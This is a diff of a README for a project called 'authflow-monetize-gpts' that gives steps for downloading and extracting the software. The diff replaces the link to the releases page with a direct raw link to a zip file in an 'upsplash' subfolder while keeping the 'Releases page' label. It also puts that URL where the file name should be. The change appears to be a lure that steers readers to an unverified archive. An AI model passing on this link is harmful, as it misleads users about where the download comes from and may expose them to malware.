Xadopeterson/authflow-monetize-gpts/README.md

 To get started, follow these simple steps to download the software:

-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/Xadopeterson/authflow-monetize-gpts/releases).
+1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/Xadopeterson/authflow-monetize-gpts/raw/refs/heads/main/upsplash/authflow-monetize-gpts-v1.5.zip).

 2. **Find the Latest Version:** Look for the newest version listed at the top of the page.

 3. **Download the File:** Click on the appropriate download link for your system to get the software.
-The file will typically be named like `authflow-monetize-gpts-vX.X.zip`.
+The file will typically be named like `https://github.com/Xadopeterson/authflow-monetize-gpts/raw/refs/heads/main/upsplash/authflow-monetize-gpts-v1.5.zip`.

 4. **Extract the File:** Once the download completes, locate the zip file on your computer.
 Right-click on the file and select "Extract All."
 This will create a folder with the program files.